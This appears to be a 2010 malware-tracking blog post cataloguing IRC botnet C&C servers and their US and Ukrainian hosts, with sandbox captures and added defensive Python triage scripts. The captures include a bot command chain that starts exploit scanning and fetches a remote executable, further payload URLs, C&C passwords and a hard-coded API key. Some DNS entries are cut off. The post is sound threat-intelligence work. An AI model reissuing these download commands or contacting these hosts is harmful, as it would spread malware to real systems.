Month: November 2010

98.126.44.98 (Botnet hosted with kryptservers.com, USA, California)

Still a US hoster involved in botnet hosting.

Remote Host         Port Number
208.53.183.219      80
208.53.183.73       80
208.53.183.92       80
98.126.44.98        8100

PASS laorosr
ircd here
MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720] @ -ix
MODE #dpi -ix
Joins channel: :#!
#! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30

The channel topic is an rbot/sdbot-style command chain: the .asc exp_all commands start exploit scanning, and the .http command points at http://208.53.183.217/use13.exe, a second payload in the same 208.53.183.0/24 range as the HTTP hosts listed above.

bss-crypt.no-ip.info

Processes Created
PId    Process Name    Image Name
0x378  cc.exe          C:\WINDOWS\cc.exe

Threads Created
PId    Process Name    TId    Start       Start Mem    Win32 Start    Win32 Start Mem
0x2ac  lsass.exe       0x298  0x7c810856  MEM_IMAGE    0x77e76bf0     MEM_IMAGE
0x348  svchost.exe     0xf8   0x7c810856  MEM_IMAGE    0x7c910760     MEM_IMAGE
0x378  cc.exe          0x374  0x7c810867  MEM_IMAGE    0x4973f0       MEM_IMAGE
0x3f4  svchost.exe     0x67c  0x7c810856  MEM_IMAGE    0x77e76bf0     MEM_IMAGE

DNS Queries
DNS Query Text
bss-crypt.no-ip.info
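The thread table above is the kind of output where injection shows up: threads appear in lsass.exe and svchost.exe although the sample only started cc.exe. The following is an added example for this page (not the sandbox vendor's or the blog's own code) that parses such a table and applies the two checks an analyst runs on it: which threads live in a process other than the sample, and whether any thread's start address lies outside a loaded image (not MEM_IMAGE), which is what a remote thread pointing at freshly allocated shellcode looks like. SAMPLE_TABLE is the page's table plus one constructed MEM_PRIVATE row to exercise the second check; the parser also accepts the flattened one-line form the page was extracted into.

```python
"""Triage a sandbox "Threads Created" table for injection artefacts.

Added example, not the sandbox's or the blog's own code. SAMPLE_TABLE is
the cc.exe table from this page plus one constructed MEM_PRIVATE row.
"""
import re
from typing import Dict, List, NamedTuple


class ThreadRow(NamedTuple):
    pid: int
    process: str
    tid: int
    start: int
    start_mem: str
    win32_start: int
    win32_mem: str


# One row: PId Process TId Start StartMem Win32Start Win32Mem
ROW = re.compile(
    r"(0x[0-9a-f]+)\s+(\S+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(MEM_\w+)\s+"
    r"(0x[0-9a-f]+)\s+(MEM_\w+)",
    re.IGNORECASE,
)

SAMPLE_TABLE = """\
PId Process Name TId Start Start Mem Win32 Start Win32 Start Mem
0x2ac lsass.exe 0x298 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE
0x348 svchost.exe 0xf8 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE
0x378 cc.exe 0x374 0x7c810867 MEM_IMAGE 0x4973f0 MEM_IMAGE
0x3f4 svchost.exe 0x67c 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE
0x3f4 svchost.exe 0x6a0 0x7c810856 MEM_IMAGE 0x00a20000 MEM_PRIVATE
"""
# The last row is constructed: a thread whose Win32 start is private memory.


def parse_threads(text: str) -> List[ThreadRow]:
    """Works on the row-per-line table and on the flattened one-line dump alike."""
    rows = []
    for m in ROW.finditer(text):
        pid, proc, tid, start, smem, w32, wmem = m.groups()
        rows.append(ThreadRow(int(pid, 16), proc, int(tid, 16), int(start, 16),
                              smem.upper(), int(w32, 16), wmem.upper()))
    return rows


def triage(rows: List[ThreadRow], sample_process: str) -> Dict[str, List[ThreadRow]]:
    """Group the threads worth a second look by the reason they stand out."""
    findings: Dict[str, List[ThreadRow]] = {"foreign_process": [], "non_image_start": []}
    for r in rows:
        # New thread in a process the sample did not create: candidate injection target.
        if r.process.lower() != sample_process.lower():
            findings["foreign_process"].append(r)
        # Start address not backed by a module: shellcode or a manually mapped payload.
        if r.start_mem != "MEM_IMAGE" or r.win32_mem != "MEM_IMAGE":
            findings["non_image_start"].append(r)
    return findings


def report(text: str, sample_process: str) -> List[str]:
    rows = parse_threads(text)
    f = triage(rows, sample_process)
    lines = [f"{len(rows)} threads parsed"]
    for r in f["foreign_process"]:
        lines.append(f"thread {r.tid:#x} in {r.process} (pid {r.pid:#x}), "
                     f"win32 start {r.win32_start:#x} {r.win32_mem}")
    for r in f["non_image_start"]:
        lines.append(f"thread {r.tid:#x} in {r.process} starts outside any image ({r.win32_mem})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_TABLE, "cc.exe")))
```

On the page's own rows every start is MEM_IMAGE, so the non-image check stays quiet; the foreign-process list is the signal here. That is expected for LoadLibrary-style DLL injection, whose thread starts inside kernel32, so a MEM_IMAGE start does not clear a thread on its own, and this table does not record which process created each thread, which is the column that would settle it.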

ms.allnewdots.com (Butterfly bot hosted in the United States, Woodstock, Fdcservers.net)

Yes, again this hoster, and again a Butterfly bot hosted in the USA. They probably don't know that the Butterfly bot kit's author was arrested in 2010 by Slovenian police working with the FBI.

IP Location: United States Woodstock Fdcservers.net
Resolve Host: sys-047.leeware.com
IP Address: 208.53.131.135

exe file hosted with fdcservers.net: http://74.63.78.13/bdnu.exe
IP Location: United States Woodstock Fdcservers.net
Resolve Host: roa.ecuaideas3.net
IP Address: 74.63.78.13
Resolved

gutyeaz.com

DNS Lookup
Host Name                  IP Address
dell-d3e62f7e26            10.1.6.2
gutyeaz.com                184.106.247.215
kadds.ru                   91.211.117.127
rapidshare.com             195.122.131.4
rs286l34.rapidshare.com    62.67.1.87

UDP Connections
Remote IP Address: 184.106.247.215  Port: 2727
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: 184.106.247.215  Port: 2727
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s)

limon4ik.com (E-mail worm hosted with http://www.interserver.net/, US hosting)

DNS Lookup
Host Name                    IP Address
ssl.aukro.ua                 193.23.48.228
ir.kagoshima-u.ac.jp         163.209.180.1
ss1.coressl.jp               202.172.28.253
www.billboxrecords.com.br    200.234.192.141
www.saredrogarias.com.br     74.52.66.226
forum.gryada.org.ua          193.169.188.64
loja.tray.com.br             201.20.35.20
masterkey.com.ua             212.82.216.42
isu2.tup.km.ua               212.111.198.59
www.stone.co.ua              67.15.97.220
www.mlh.co.jp                115.125.150.234
sou
wow.merlin.org.ua            91.203.146.30
global-host.com.ua
ex2.broadser
form.cao.go.jp               203.180.136.89
bunker.org.ua                195.214.214.53

UDP Connections
Remote IP Address: 10.1.1.1  Port: 53
Send Datagram: 2 packet(s) of size 37
Recv Datagram: packet(s)

ihax.sytes.net (CableLink109-243.telefonia.InterCable.net, Mexico)

ihax.sytes.net: type A, class IN, addr 201.172.109.243
api.ipinfodb.com: type A, class IN, addr 67.212.74.82

Data (HTTP request sent to api.ipinfodb.com):
GET /v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off HTTP/1.1
Host: api.ipinfodb.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Connection: closed

The sample geolocates the infected host by country through the ipinfodb API using a hard-coded API key (the key= parameter above), with a spoofed Firefox 3.5 User-Agent; the C&C itself is the dynamic-DNS name ihax.sytes.net on a Mexican cable-modem address.

91.203.146.65 (Botnet hosted with http://goodnet.com.ua/, Ukraine)

Remote Host         Port Number
173.193.205.116     8014
69.163.248.145      80
69.163.250.145      80
69.50.197.244       80
89.238.149.67       80
92.241.184.111      80
91.203.146.65       8878 (port changed to 7276)

USER duzlurcv duzlurcv duzlurcv :ajpenurz
NICK ROIKiQGLO
PONG :lols.nope.com
MODE ROIKiQGLO +xi
JOIN #maxi
USERHOST ROIKiQGLO
MODE #maxi +smntu
Now talking in #maxi
Topic On: [ #maxi ] [ =IxgN+TVR/M3693AU+b3Zymnqh7XjJ1xl8jRu0jdcrmWRb9Cr2BZAVxeyjwZ5PinlmrfYQ071m7u5f6tl0MGpVffGThs1UcXWLPEB2izDaRPHN8sxZILY/zc1b9ShwEHRBfKIZHRzdVWFQLUQ74SpuICbyIMK9U9yfLFnFvRV2Q1ry1d9NFrF1qzxS1kgf9/MG+tReUpUCS70eGoaIVQBELe+h1jgUQOlu6bKkas6aD8ro4e/ZSuWsr90pUDny6j8vHGNx99a/dFEw/gHLDmso9qbVB ]
Topic By:

Unlike the plain-text topics in the other entries, this bot takes its command from an obfuscated (base64-like) channel topic, and the USER/NICK strings are random rather than built from victim metadata.

64.202.120.41 (botnet hosted with hostforweb.com)

Another botnet server hosted in the US (Chicago) with www.hostforweb.com.

Remote Host         Port Number
204.0.5.42          80
204.0.5.43          80
204.0.5.58          80
208.43.117.134      80
216.178.38.103      80
216.178.38.168      80
63.135.86.30        80
63.135.86.37        80
64.208.138.101      80
66.220.149.25       80
64.202.120.41       1234

PASS xxx
ircd here
NICK NEW-[USA|00|P|09511]
USER XP-8613 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|09511] -ix
JOIN #!nn! test
PONG 22
MOTD

bbg.moiservice.com

DNS Lookup
Host Name                  IP Address
bbg.moiservice.com         74.117.174.82
i3ED6DA76.versanet.de      62.214.218.118

Opened listening TCP connection on port: 55907
Opened listening TCP connection on port: 113

C&C Server: 74.117.174.82:16667
Server Password:
Username: laMer
Nickname: XP|Ubd2
Channel: #lbl# (Password: lam)
Channeltopic: :

Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\mIRC "DateUsed" = 1264705554
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC "DisplayName" =

The listener on TCP 113 is an ident responder, opened so the IRC server's ident lookup of the bot succeeds; the mIRC registry keys show this is a scripted mIRC build rather than a compiled bot.

gs.unicatz.com

Remote Host         Port Number
74.117.174.82       2010

NICK XPUiw3
USER laMer "" "gs.unicatz.com" : You Think i aughty
USERHOST XPUiw3
MODE XPUiw3 +i
JOIN #tcp# d0s
MODE #tcp#
PONG :s11.cpe.netcabo.uk

* The following ports were open in the system:
Port    Protocol    Process
1052    TCP         Winter.pif (%System%\dllcache\Winter.pif)
32403   TCP         Winter.pif (%System%\dllcache\Winter.pif)

Registry Modifications
* The following Registry

Same C&C host (74.117.174.82) and the same USER string (laMer) as the bbg.moiservice.com entry above, on a different port and channel: the two samples belong to one operator.
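The 98.126.44.98, 91.203.146.65, 64.202.120.41, bbg.moiservice.com and gs.unicatz.com entries all have the same shape: a "Remote Host / Port" list, then the raw IRC handshake the bot sent. The following is an added example for this page (not the blog's own tooling) that reduces such a capture to the indicators an analyst reuses, the C&C server and port, server password, nick template, channels with their keys and any download URL in a channel command, and lists why the session looks like bot C&C rather than a person on IRC. The two samples are constructed from the 64.202.120.41 and 98.126.44.98 entries above; the list of standard IRC ports is this example's own assumption.

```python
"""Reduce IRC sandbox captures to C&C indicators.

Added example for this page, not the blog's own code. The two samples are
constructed from the 64.202.120.41 and 98.126.44.98 entries above.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumed set of ports a legitimate IRC client normally uses; the bots above use none of them.
STANDARD_IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 6697, 7000}

HOST_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})$")
URL = re.compile(r"https?://[^\s|'\"]+")

SAMPLE_HOSTFORWEB = """\
Remote Host Port Number
204.0.5.42 80
208.43.117.134 80
64.202.120.41 1234
PASS xxx
NICK NEW-[USA|00|P|09511]
USER XP-8613 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|09511] -ix
JOIN #!nn! test
PONG 22
"""

SAMPLE_KRYPT = """\
Remote Host Port Number
208.53.183.219 80
98.126.44.98 8100
PASS laorosr
MODE #! -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720] @ -ix
Joins channel: :#!
#! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30
"""


@dataclass
class CncIndicators:
    server: Optional[str] = None
    port: Optional[int] = None
    password: Optional[str] = None
    nick: Optional[str] = None
    channels: List[Tuple[str, Optional[str]]] = field(default_factory=list)  # (channel, key)
    download_urls: List[str] = field(default_factory=list)


def parse_capture(text: str) -> CncIndicators:
    ind = CncIndicators()
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_PORT.match(line)
        if m:
            host, port = m.group(1), int(m.group(2))
            # The host list mixes HTTP checks with the C&C; the IRC server is
            # the peer on a non-web port, so keep the last such entry.
            if port not in (80, 443):
                ind.server, ind.port = host, port
            continue
        ind.download_urls.extend(URL.findall(line))
        if line.lower().startswith("joins channel:"):  # sandbox wording, not raw IRC
            ind.channels.append((line.split(":")[-1].strip(), None))
            continue
        toks = line.split()
        if not toks:
            continue
        cmd, args = toks[0].upper(), toks[1:]
        if cmd == "PASS" and args:
            ind.password = args[0]
        elif cmd == "NICK" and args:
            ind.nick = args[0]
        elif cmd == "MODE" and args and not args[0].startswith("#"):
            ind.nick = ind.nick or args[0]  # the bot's nick is also the MODE target
        elif cmd == "JOIN" and args:
            ind.channels.append((args[0], args[1] if len(args) > 1 else None))
    return ind


def nick_template(nick: str) -> str:
    """Collapse per-victim digits so nicks from one bot build compare equal."""
    return re.sub(r"\d", "#", nick)


def assess(ind: CncIndicators) -> List[str]:
    """Reasons this session looks like bot C&C rather than a human IRC client."""
    reasons = []
    if ind.port is not None and ind.port not in STANDARD_IRC_PORTS:
        reasons.append(f"IRC handshake on non-IRC port {ind.port}")
    if ind.nick and re.search(r"[\[\]|]", ind.nick):
        reasons.append("nick carries victim metadata fields (country/OS/id)")
    if any(key for _, key in ind.channels):
        reasons.append("keyed channel join")
    if ind.download_urls:
        reasons.append("download URL in channel command")
    return reasons


if __name__ == "__main__":
    for sample in (SAMPLE_HOSTFORWEB, SAMPLE_KRYPT):
        ind = parse_capture(sample)
        print(f"{ind.server}:{ind.port} pass={ind.password} "
              f"nick={ind.nick and nick_template(ind.nick)} channels={ind.channels}")
        print("  urls:", ind.download_urls, "| reasons:", "; ".join(assess(ind)))
```

The nick template (NEW-[USA|##|P|#####]) is the field worth pivoting on: it survives across victims of one build while the digits do not, and together with the server password and channel key it identifies the botnet more reliably than the C&C IP, which the 91.203.146.65 entry shows changing ports mid-session.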